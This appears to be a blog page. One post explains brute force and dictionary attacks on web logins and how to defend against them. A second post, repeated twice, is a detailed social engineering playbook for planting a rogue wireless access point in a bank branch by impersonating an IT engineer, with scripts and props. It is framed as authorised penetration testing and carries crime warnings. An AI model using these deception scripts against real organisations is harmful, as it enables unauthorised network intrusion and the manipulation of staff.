Session hijacking attacks such as Cross-site Scripting can steal a user's authentication token and transmit it to a malicious third party, who can then use it to impersonate the legitimate user. SQL injection attacks can also be very effective at bypassing authentication. By sending a specially-formatted username and password combination containing SQL code to the login form, an attacker can often trick the server into granting him unauthorized access. These types of attacks get a lot of attention since they are creative, elegant, and effective. However, there is another type of attack that can be just as effective, if not as elegant or creative. A brute force attack (or dictionary attack) can still be a dangerous threat to your Web site unless proper precautions are taken.
The brute force attack is about as uncomplicated and low-tech as Web application hacking gets. The attacker simply guesses username and password combinations until he finds one that works. It may seem like a brute force or dictionary attack is unlikely to ever succeed. After all, what are the odds of someone randomly guessing a valid username and password combination? Surprisingly, the odds for a brute force attack can be quite good if the site is not properly configured. There are several factors that work to the hacker's advantage, the most important of which is human laziness.
Don't Be Lazy - Choose a Password Carefully!
Generally, people do not remember complicated passwords very well. If users are allowed to create their own passwords, they will often create very simple ones like "password", "1234", their spouse's name, or their favorite sports team. Passwords like these are easy for the user to remember, but unfortunately they are also easy for someone else to guess. Furthermore, any serious hacker who attempts a brute force attack will not be sitting at a Web browser, guessing at authentication credentials and typing them in. He will be using an automated tool for the brute force attack that can make thousands of requests per minute with credentials generated from a large list of possible values. Often this list is an actual dictionary, hence the term "dictionary attack." If a user chooses a common password, such as a dictionary word, the automated tool will eventually guess it, and the user's account will be compromised.
Also, once the brute force attack has revealed a valid username and password combination for one Web site, the hacker knows that the same combination is likely to work for other Web sites. In a study conducted by the University of Wichita, more than half of the test subjects reported using the exact same password for multiple sites. This laziness works to the hacker's advantage. If, for example, a hacker is able to use a dictionary attack to obtain a valid user credential for Amazon.com, then it is probable that the same credential would be valid for other popular Web sites, such as eBay.
Sidestepping a Dictionary Attack with Username Selection
Of course, a password is only half of the required login credential. A username is also required. While it is less likely that a dictionary word would be used as a username, there are still some common usernames that hackers are certain to try with a brute force attack. First among these are "admin" and "administrator". These names are especially dangerous since they are not only easily guessed, but the accounts they represent are usually highly privileged administrative accounts. If the hacker's dictionary attack could gain access to an administrative account, he could probably do much more damage to the system than he could if he gained access to a regular user's account.
Administrative accounts are not the only problem: many Web applications and Web application frameworks create default users during installation. If the site administrator does not remove these default users or at least change their passwords, these accounts will be easy targets for a dictionary attack. Finally, when users are allowed to choose their own usernames, they often choose their email address, since it is easy to remember. Once again, the user's laziness is a benefit to a hacker using a brute force attack. Armed with a list of email addresses (perhaps obtained from a spammer) and a dictionary of passwords (easily obtained anywhere), an attacker has an excellent chance of breaking into at least one user's account.
Countering a Brute Force Attack with a Strong Password Policy
The primary defense against a brute force attack must be enforcement of a strong password policy. As mentioned earlier, dictionary words make poor passwords. Password size is also important: the longer the password, the more difficult it will be to force. While there is no strict definition of a strong password that will be harder to determine via a dictionary attack, some good guidelines would be:
- Minimum length of at least seven characters
- Must include both upper and lower case characters
- Must include numeric characters
- Must include punctuation
Obviously, most Web sites will want to block a dictionary attack much sooner than 11,000 years into the attack. Many organizations use an intrusion detection system (IDS) to detect an abnormally high number of requests coming from a single user. This is a good idea, but it is not sufficient to prevent the brute force attack. A clever hacker will simply reduce the bandwidth used by his automated tool until it falls under the alert threshold of the IDS.
Other Defensive Strategies - And Why They Don't Work
Another common defense strategy against a dictionary attack is to automatically disable an account after a certain number of failed login attempts. For example, if the server detects that the user "bobsmith" has provided an incorrect password three times since his last login, the server might decide that the "bobsmith" account is the subject of a brute force attack and will disable it. The account may automatically reactivate after 30 minutes, or the user might have to contact the site administrator to have the account reactivated. In either case, automatically disabling user accounts is a poor security mechanism to fight a dictionary attack. In the first place, by disabling accounts the system has traded an authentication evasion vulnerability for a denial of service vulnerability. If an attacker can disable an account by incorrectly guessing its password three times every 30 minutes, he can effectively prevent that user from ever accessing the system. Imagine how damaging a dictionary attack could be if it were used against an administrative account.
In the second place, locking out accounts is ineffective against a brute force attack because this technique assumes that the attacker is keeping the username constant and varying the password. What if the attacker instead kept the password constant and varied the username? We already know that a large percentage of users use common passwords like "password". A hacker using a dictionary attack could try "password" for each of the users in his username list, which would not only have a high chance of success, but would also evade the account lockout logic. An attacker could make thousands of login attempts, and even if every one of them failed, the system will only register one incorrect login per account.
A Better Defense: Incremental Delay
A better strategy for blocking any brute force attack is to incrementally delay the page response after failed login attempts. After the first failed login attempt, for example, the response would be delayed by one second. After the second failed attempt, the response would be delayed by two seconds, and so on. A one-, two-, or even six-second delay is probably not going to bother a human user too seriously. Certainly he will find it less irritating than having to wait 30 minutes for his account to reactivate because he accidentally left his caps lock key on. On the other hand, an incrementing delay can completely defeat an automated tool being used for a brute force attack. Assuming the tool could normally make ten requests per second, the time it would take to make one thousand requests would jump from two minutes to five days. This pretty much renders the brute force attack tool useless. An incrementing delay also solves the problem of the attacker holding the password constant and varying the username. Since the system tracks failed login attempts on a user session basis and not an authentication credential basis, the delay logic cannot be bypassed this way.
There is one serious shortcoming to the incrementing delay approach: state must be kept in order to record the number of failed login attempts by the current user. The dictionary attack tool can be set up to begin a new session on every request by never sending a session identification token to the server. In this situation, the server will not be able to track the number of failed logins, and the delay will not be properly applied. It is possible to track a user from his IP address instead of his session token, but this technique has problems as well. Sometimes multiple users share a single IP address, and sometimes a single user can change IP addresses between requests. While the incrementing delay technique is not perfect, in many cases it is a better solution to fighting a dictionary attack than the widely used practice of locking out accounts after failed login attempts.
Carefully Word Your Error Messages
Finally, it is important to create appropriate error messages in response to failed login attempts. Many Web sites inadvertently aid hackers by providing overly helpful error messages. Consider the difference between the messages "User ID not found" and "Incorrect password." These messages give a lot of information to a potential attacker. "User ID not found" tells the hacker that the user he is trying to determine via brute force attack does not exist in the system. There is no point in continuing to try different passwords for this username. He can continue on to the next username in the list, saving himself thousands of useless requests and hours of time. On the other hand, "Incorrect password" tells him that the username he has tried with his dictionary attack does exist, but that the password is wrong. Now he knows that he has a potential victim and can focus his efforts on breaking that user's password. It is much safer for the application to respond with an ambiguous message like "Incorrect username or password" when a login attempt fails. There is no way to tell from this error which part of the credential was invalid. Therefore, there are no clues that a hacker can obtain from this error that can help him reduce his workload and break the system faster.
Conclusion
In conclusion, sometimes old, boring attacks can work just as well as the new, exciting ones. Low-tech as it might be, a brute force attack can be very effective at compromising your Web application unless proper defenses are used. The first and foremost method of defeating a brute force attack is to require all users to choose a strong password. Passwords should be required to contain at least seven characters, with mixed upper- and lower-case letters, numbers, and punctuation. Also, consider implementing an incrementing response delay routine in your application in place of an automatic account lockout. Finally, be sure to display nondescript, ambiguous login failure messages such as "Invalid username or password." Messages like this provide no extra information about the system that a hacker using a dictionary attack can take advantage of to lighten his workload. Following these guidelines will help you protect your application and your users from the brutes of the world.
Social Engineering: How It Is Done
This is an example from an audit I actually performed. Social Engineering is the act of bypassing operational security measures. In this case meaning bypassing corporate policies that have been set for employees in order to gain information. The process is quite simple just in the same manner a Trojan horse projects itself as something it is not, you are going to project yourself as something you are not.
** Warning **
These examples are only to be performed on an institution that has hired you for performing this type of testing action. Any one of these actions will be considered a Federal Crime. This information is intended as help for Network Security Consulting firms or Security Consulting firms.
***********
As in any project you are going to take you must set an achievable goal. For this example we wish to setup a wireless access point within a bank so that we can leisurely access the information from within the institution while safely outside. After proposing this idea to the institution for approval and it is approved we need to decide what items we will need.
Insurance Items
First you need to put each of your actions and time of interactions with staff into a well organized document that should be approved by Board of Directors from the organization. Have an original of this document notarized and with you. In addition have a separate letter with the companies letter head signed and with a copy of the license of the executive assigned to oversee the test. Have a direct phone number for the overseeing executive as well as a secondary cell phone to ensure they will be contactable in case of a failed attempt. If your test fails and the staff follow procedures you will be arrested. You will need these documents and information so that authorities can contact the proper individuals and determine the credence of your story.
Your Story
You must remember you are crafting a piece of fiction to not only deceive other individuals but also encouraging them to actively participate. The most common story I would use is that a branch office is having network latency in other words slow connections to the internet and central office locations. This is a perfect story for a few reasons.
1) Everyone believes there connections could be faster, to the internet and else where.
2) It allows you to enter the networking cabinet to install your wireless access point, and allows it to be out of plain site.
3) No one ever knows where it is so it gives you a bit of roaming capability and if you are escorted increases their impatience which is important (more on that later)
4) It ensures you do not have to work on an individuals PC, you always want to avoid working on someones PC. This is because a PC is part of a persons personal space. If you are working on it they will take great interest in what you are doing, which is something you do not want.
5) It is simple and easy to understand but complex enough to bore people, if something is complex people scrutinize it more. We are using something they take for granted (network connectivity) and something they have no interest in learning about. Using excuses such as cleaning spy ware off of a machine encourage interactivity. They could have a machine at home that have spy ware problem. So they may want to see what you are doing to learn how to fix there own. Interactivity is something you don't want.
The Props
Just as in a movie and a play, proper props will enhance the experience of the audience and put them at ease. In our case we are looking to perform the same thing. Before covering what to bring, lets cover what not to bring which is more important. Objects that encourage interaction or curiosity is what we don't want.
1) No laptops: In this case we do not need it. They encourage people to look at what you are doing on the screen, and can also send red flags that you are copying information. If you have to bring one make it an old one, make the wall paper have the logo of your fictitious company. Usually on the outside of the laptop I will include a fake "Property Of:" Like Property of: Light Speed Technologies (if lost contact: insert fake number here)
2) No fancy consumer gadgets: You don't want anything that is a conversation starter. You want people disinterested in you.
Now items that you should have:
1) Uniform: This should be the classic collared work shirt with company logo on the breast pocket, make sure it is wrinkled and even slightly dirty, Nothing horrible but you need to look like you have been sitting in your truck all day drinking coffee going from site to site. Jeans or wrinkled Khakis will out the ensemble. Get yourself some work boots that are well worn. The key is too look like you have been at your fictional company for a while, you are a seasoned veteran just doing the daily grind.
2) Work Bag: I use a well worn work bag that is open on the top so people do not think that anything is concealed inside. This is a common bag electricians use, I keep tools attached to the outside like pliers and cables, with zip ties attached to it. I then put the wireless access point under the cables. For the contents use everything you would take on a networking call. You are an IT professional you should know what needs to be inside. Remember nothing new.
3) Clip board and Work Orders: Create some fake work order forms or copy them from the internet. Fill out a couple as if from other fictional offices. They key is to look like you have been out all day. Make sure the forms don't looks so crisp that you just printed them out from a printer an hour ago. Your local office supply store will also sell Carbon Paper generic work order forms.
4) Work Van: Not unnecessary if the parking lot is not in eye shot. But if it is, a quick $50 rental from a home improvement store is great. Especially since the trucks are in terrible shape and dirty. Go on the net and order some magnetic signs with your company logo and name that you can stick to the side. They are extremely cheap and you can use them over and over again and they easily cover any other logo's on the truck.
5) Wireless Access Point: I always use some form of commercial enterprise brand of access point. Such as a Cisco Aironet. Never use a consumer grade device. First it will have poor range, second it will be recognizable to any escort you may have. I usually air brush a matte black finish over the device to cover an lettering that may indicate its actual use and it help blend into dark spaces. You should have this configured to be secure, you do not want to open holes in the security of a bank.
6) LAN testing device, a large hand held like Microtech or Fluke produce. Plugging this into the network will not send up any red flags since it does not look like a computer. And the look lets even the least bit techy of a person know it is some sort of testing device.
The Target
First your greatest chance of success is with a mid-size bank. Small banks everyone knows each other, large banks they most likely have internal staff that perform these functions.
Second, find the smallest branch, the farthest from the main office. They are used to having shoddy service, they probably see IT once or twice a year. It will also have the most inexperienced branch manger. The people here are used to be less diligent and are the best targets for not asking questions.
Information Gathering
Visit the Banks website. If they have a Direct number for IT great, if not you can use the main number. Call the number posing as a telemarketer. Operate just like a telemarketer they are great at social engineering, when calling just ask " Can I speak to who handles IT", they will forward you over to an IT engineer, most executive secretaries will know you are a telemarketer and will forward you to someone less important. The entire time take down the names of each person you here, writing down what you assume the job function is. Whoever you get hit them with your canned message, 99% they will hang up on you which is fine, you have the information you need.
Next take a drive out to your target site. Take note of the foot traffic going in and out, what times are busy and what time they close up shop. If bank hours are until 4pm and you see them locking the doors at 4:00 exactly and out the door by 4:05pm , you know you picked the perfect location. These people are in a hurry to leave and this will increase their impatience and encourage mistakes.
The Timing
If the branch closes at 4:00pm on a Friday we are going to schedule our appearance at 3:00pm and show up at 3:30. Why? because people want to leave and they are not going to be interested in what you are doing at all.
The Setup
Now this might seem a bit different form what other people may do but I call ahead of time and schedule my visit. Why? because no one expects an intruder is going to schedule there time with the victim. This also makes it so that you do not need a story to get in the front door, showing up unannounced will increase suspicions and encourage them to call the main office. Many people use the old "Do you mean the main office didn't call you?" That send up immediate red flags. If you can have a female coworker call for you. I know it is stereotypical but it does lower the guard of many people. You or your colleague should call Thursday at lunch time. Ask for the branch manager. Your script should go like this:
You: Hello can I speak to the branch manager please?
Target: Yes that is me
You: I am just calling to schedule one of our engineers that is coming to your branch. The (insert main office location) informed us that your location has been experiencing latency or slowness when using the internet or contacting the main office. Our engineer will test the line and install an upgrade if need be. Unfortunately we only have 3pm tomorrow since the engineer is going to be at other branches in the morning.
Target: I didn't know that was happening?
You: Yes (insert IT employee here) has been working with your other branches on the same issue.
Target: Ok thank you.
You: Here is our number if you notice any issues with your connection between now and then please do not hesitate to contact us.
Now giving the number is very important, first it will relax the branch manager by indicating you are actually a real company, also if someone has become suspicious you will receive a call. This will let you know your cover is blown before showing up and will save you the time of having to deal with local authorities.
Game Day
It's Friday, park in a lot down the street and then call the branch at 3:10 already 10 minutes late. Tell them you are the engineer, give your name, (always use your real first name, it will help you be natural) Apologize for being late and tell the manager you are almost there. Now you show up at 3:30. Your conversation should go like this.
You: I am very sorry that I am so late, dispatch has been messing up the locations all day, I can get this done real quick since you guys are probably closing soon.
Target: Thats ok what do you need to do?
You: I just need to know where the network closet is, its probably the one with all the wires going to it.
Target: Oh yea I know where that is (They wont be suspicious of this, they are trained to be nervous about the money, if you stay clear of the vault and teller stations no one will be concerned with you.)
Target: Here it is.
You: Thanks, lets see what we got. ( Hook up your testing gear, fiddle with wires, take your time, if you are lucky they will ask you if they can leave you here because they have to finish some work up.. Yes that is actually what happened to me and it made installation a breeze. If not continue with the dialog)
You: Yea you guys are definitely having some slowness (show them the test screen, it doesn't matter what it says) I will put an accelerator in, that should speed everything up, it will take me a few seconds. (Now just connect your wireless access point in)
You: There all set, sorry again for being late, I just need you to initial the work order, and I will get out of here. Also do you have a card? I will call you next week to see if everything is working ok.
And now you leave. You were a great engineer, and you have successfully performed a social engineering attack. Each project you do where social engineering is involved you will get more comfortable and hence much more successful. Hopefully this will help other engineers out, it took me a number of tries before I was able to come up with this method, and it has been extremely successful.
--B
** Warning **
These examples are only to be performed on an institution that has hired you for performing this type of testing action. Any one of these actions will be considered a Federal Crime. This information is intended as help for Network Security Consulting firms or Security Consulting firms.
***********
As in any project you are going to take you must set an achievable goal. For this example we wish to setup a wireless access point within a bank so that we can leisurely access the information from within the institution while safely outside. After proposing this idea to the institution for approval and it is approved we need to decide what items we will need.
Insurance Items
First you need to put each of your actions and time of interactions with staff into a well organized document that should be approved by Board of Directors from the organization. Have an original of this document notarized and with you. In addition have a separate letter with the companies letter head signed and with a copy of the license of the executive assigned to oversee the test. Have a direct phone number for the overseeing executive as well as a secondary cell phone to ensure they will be contactable in case of a failed attempt. If your test fails and the staff follow procedures you will be arrested. You will need these documents and information so that authorities can contact the proper individuals and determine the credence of your story.
Your Story
You must remember you are crafting a piece of fiction to not only deceive other individuals but also encouraging them to actively participate. The most common story I would use is that a branch office is having network latency in other words slow connections to the internet and central office locations. This is a perfect story for a few reasons.
1) Everyone believes there connections could be faster, to the internet and else where.
2) It allows you to enter the networking cabinet to install your wireless access point, and allows it to be out of plain site.
3) No one ever knows where it is so it gives you a bit of roaming capability and if you are escorted increases their impatience which is important (more on that later)
4) It ensures you do not have to work on an individuals PC, you always want to avoid working on someones PC. This is because a PC is part of a persons personal space. If you are working on it they will take great interest in what you are doing, which is something you do not want.
5) It is simple and easy to understand but complex enough to bore people, if something is complex people scrutinize it more. We are using something they take for granted (network connectivity) and something they have no interest in learning about. Using excuses such as cleaning spy ware off of a machine encourage interactivity. They could have a machine at home that have spy ware problem. So they may want to see what you are doing to learn how to fix there own. Interactivity is something you don't want.
The Props
Just as in a movie and a play, proper props will enhance the experience of the audience and put them at ease. In our case we are looking to perform the same thing. Before covering what to bring, lets cover what not to bring which is more important. Objects that encourage interaction or curiosity is what we don't want.
1) No laptops: In this case we do not need it. They encourage people to look at what you are doing on the screen, and can also send red flags that you are copying information. If you have to bring one make it an old one, make the wall paper have the logo of your fictitious company. Usually on the outside of the laptop I will include a fake "Property Of:" Like Property of: Light Speed Technologies (if lost contact: insert fake number here)
2) No fancy consumer gadgets: You don't want anything that is a conversation starter. You want people disinterested in you.
Now items that you should have:
1) Uniform: This should be the classic collared work shirt with company logo on the breast pocket, make sure it is wrinkled and even slightly dirty, Nothing horrible but you need to look like you have been sitting in your truck all day drinking coffee going from site to site. Jeans or wrinkled Khakis will out the ensemble. Get yourself some work boots that are well worn. The key is too look like you have been at your fictional company for a while, you are a seasoned veteran just doing the daily grind.
2) Work Bag: I use a well worn work bag that is open on the top so people do not think that anything is concealed inside. This is a common bag electricians use, I keep tools attached to the outside like pliers and cables, with zip ties attached to it. I then put the wireless access point under the cables. For the contents use everything you would take on a networking call. You are an IT professional you should know what needs to be inside. Remember nothing new.
3) Clip board and Work Orders: Create some fake work order forms or copy them from the internet. Fill out a couple as if from other fictional offices. They key is to look like you have been out all day. Make sure the forms don't looks so crisp that you just printed them out from a printer an hour ago. Your local office supply store will also sell Carbon Paper generic work order forms.
4) Work Van: Not unnecessary if the parking lot is not in eye shot. But if it is, a quick $50 rental from a home improvement store is great. Especially since the trucks are in terrible shape and dirty. Go on the net and order some magnetic signs with your company logo and name that you can stick to the side. They are extremely cheap and you can use them over and over again and they easily cover any other logo's on the truck.
5) Wireless Access Point: I always use some form of commercial enterprise brand of access point. Such as a Cisco Aironet. Never use a consumer grade device. First it will have poor range, second it will be recognizable to any escort you may have. I usually air brush a matte black finish over the device to cover an lettering that may indicate its actual use and it help blend into dark spaces. You should have this configured to be secure, you do not want to open holes in the security of a bank.
6) LAN testing device, a large hand held like Microtech or Fluke produce. Plugging this into the network will not send up any red flags since it does not look like a computer. And the look lets even the least bit techy of a person know it is some sort of testing device.
The Target
First your greatest chance of success is with a mid-size bank. Small banks everyone knows each other, large banks they most likely have internal staff that perform these functions.
Second, find the smallest branch, the farthest from the main office. They are used to having shoddy service, they probably see IT once or twice a year. It will also have the most inexperienced branch manger. The people here are used to be less diligent and are the best targets for not asking questions.
Information Gathering
Visit the Banks website. If they have a Direct number for IT great, if not you can use the main number. Call the number posing as a telemarketer. Operate just like a telemarketer they are great at social engineering, when calling just ask " Can I speak to who handles IT", they will forward you over to an IT engineer, most executive secretaries will know you are a telemarketer and will forward you to someone less important. The entire time take down the names of each person you here, writing down what you assume the job function is. Whoever you get hit them with your canned message, 99% they will hang up on you which is fine, you have the information you need.
Next take a drive out to your target site. Take note of the foot traffic going in and out, what times are busy and what time they close up shop. If bank hours are until 4pm and you see them locking the doors at 4:00 exactly and out the door by 4:05pm , you know you picked the perfect location. These people are in a hurry to leave and this will increase their impatience and encourage mistakes.
The Timing
If the branch closes at 4:00pm on a Friday we are going to schedule our appearance at 3:00pm and show up at 3:30. Why? because people want to leave and they are not going to be interested in what you are doing at all.
The Setup
Now this might seem a bit different form what other people may do but I call ahead of time and schedule my visit. Why? because no one expects an intruder is going to schedule there time with the victim. This also makes it so that you do not need a story to get in the front door, showing up unannounced will increase suspicions and encourage them to call the main office. Many people use the old "Do you mean the main office didn't call you?" That send up immediate red flags. If you can have a female coworker call for you. I know it is stereotypical but it does lower the guard of many people. You or your colleague should call Thursday at lunch time. Ask for the branch manager. Your script should go like this:
You: Hello can I speak to the branch manager please?
Target: Yes that is me
You: I am just calling to schedule one of our engineers that is coming to your branch. The (insert main office location) informed us that your location has been experiencing latency or slowness when using the internet or contacting the main office. Our engineer will test the line and install an upgrade if need be. Unfortunately we only have 3pm tomorrow since the engineer is going to be at other branches in the morning.
Target: I didn't know that was happening?
You: Yes (insert IT employee here) has been working with your other branches on the same issue.
Target: Ok thank you.
You: Here is our number if you notice any issues with your connection between now and then please do not hesitate to contact us.
Now giving the number is very important, first it will relax the branch manager by indicating you are actually a real company, also if someone has become suspicious you will receive a call. This will let you know your cover is blown before showing up and will save you the time of having to deal with local authorities.
Game Day
It's Friday, park in a lot down the street and then call the branch at 3:10 already 10 minutes late. Tell them you are the engineer, give your name, (always use your real first name, it will help you be natural) Apologize for being late and tell the manager you are almost there. Now you show up at 3:30. Your conversation should go like this.
You: I am very sorry that I am so late, dispatch has been messing up the locations all day, I can get this done real quick since you guys are probably closing soon.
Target: Thats ok what do you need to do?
You: I just need to know where the network closet is, its probably the one with all the wires going to it.
Target: Oh yea I know where that is (They wont be suspicious of this, they are trained to be nervous about the money, if you stay clear of the vault and teller stations no one will be concerned with you.)
Target: Here it is.
You: Thanks, lets see what we got. ( Hook up your testing gear, fiddle with wires, take your time, if you are lucky they will ask you if they can leave you here because they have to finish some work up.. Yes that is actually what happened to me and it made installation a breeze. If not continue with the dialog)
You: Yea you guys are definitely having some slowness (show them the test screen, it doesn't matter what it says) I will put an accelerator in, that should speed everything up, it will take me a few seconds. (Now just connect your wireless access point in)
You: There all set, sorry again for being late, I just need you to initial the work order, and I will get out of here. Also do you have a card? I will call you next week to see if everything is working ok.
And now you leave. You were a great engineer, and you have successfully performed a social engineering attack. Each project you do where social engineering is involved you will get more comfortable and hence much more successful. Hopefully this will help other engineers out, it took me a number of tries before I was able to come up with this method, and it has been extremely successful.
--B
Subscribe to:
Posts (Atom)